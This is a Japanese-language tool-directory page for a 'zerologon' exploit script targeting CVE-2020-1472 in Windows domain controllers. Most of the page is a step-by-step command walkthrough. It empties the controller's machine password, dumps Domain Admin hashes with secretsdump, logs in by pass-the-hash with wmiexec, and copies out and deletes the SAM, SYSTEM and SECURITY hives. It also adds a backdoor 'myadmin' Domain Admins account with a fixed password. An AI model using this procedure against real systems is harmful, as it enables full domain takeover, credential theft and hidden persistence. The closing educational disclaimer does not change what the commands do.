Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
zerologon — CVE-2020-1472 CVSS 10/10 を悪用する zerologon スクリプト | Kitploit
ツール/GitHubGitHub/wrathfuldiety/zerologon
パスワードクラッキング特権昇格脆弱性分析エクスプロイト横移動ポストエクスプロイトペネトレーションテスト学習と教育
GitHubwrathfuldiety/zerologon

zerologon

CVE-2020-1472 CVSS 10/10 を悪用する zerologon スクリプト

リポジトリを見る
25年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

zerologon

CVE-2020-1472 CVSS 10/10 を悪用する zerologon スクリプト エクスプロイトコードは https://www.secura.com/blog/zero-logon と https://github.com/SecuraBV/CVE-2020-1472 に基づいています。オリジナルの研究とスキャナーは Secura によるもので、RiskSense Inc. が修正を加えています。 https://github.com/risksense/zerologon

悪用するには、既存の Impacket インストールをすべて削除し、https://github.com/SecureAuthCorp/impacket/commit/b867b21 またはそれより新しいバージョンの Impacket をインストールしてください。

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

次に、以下を実行します:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

それが成功すると、以下の操作ができるようになります:

sudo secretsdump.py -just-dc domain/hostname\$@ip

パスワードのプロンプトで「Enter」を押すとそのまま通過でき、 Domain Admin のハッシュを取得できるはずです。それを取得したら、secretsdump で得た資格情報を使って対象の DC に対して wmiexec.py を実行します。

wmiexec.py domain/Administrator@ip -hashes hash

そして、次の操作を行います:

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

その上で、念のため新しい管理者アカウントを作成できます:

net user myadmin Hello1234 /ADD /DOMAIN

そして、完全な権限を得るために新しいアカウントを Domain Admins グループに追加します:

net group "Domain Admins" myadmin /ADD /DOMAIN

そしておそらく、C:> から exit します。

次に、以下を実行できます:

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

これにより、マシンアカウントの元の NT ハッシュが表示されるはずです。その後、以下のコマンドでその元のマシンアカウントのハッシュをドメインに再インストールできます:

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

DC が正常に動作し続けるためには、元のハッシュを再インストールする必要があります。

そして、復元プロセスが機能したかどうかを確認するには:

sudo secretsdump.py -just-dc domain/hostname\$@ip

パスワードのプロンプトで「Enter」を押しても、もう機能しなくなります。

これで完了です。

健闘を祈ります。

免責事項: これは純粋に教育目的であり、いかなる行動やその結果についても責任を負いません。 他人のデバイスへのハッキングは違法であり、法律で罰せられます。

ツールをダウンロード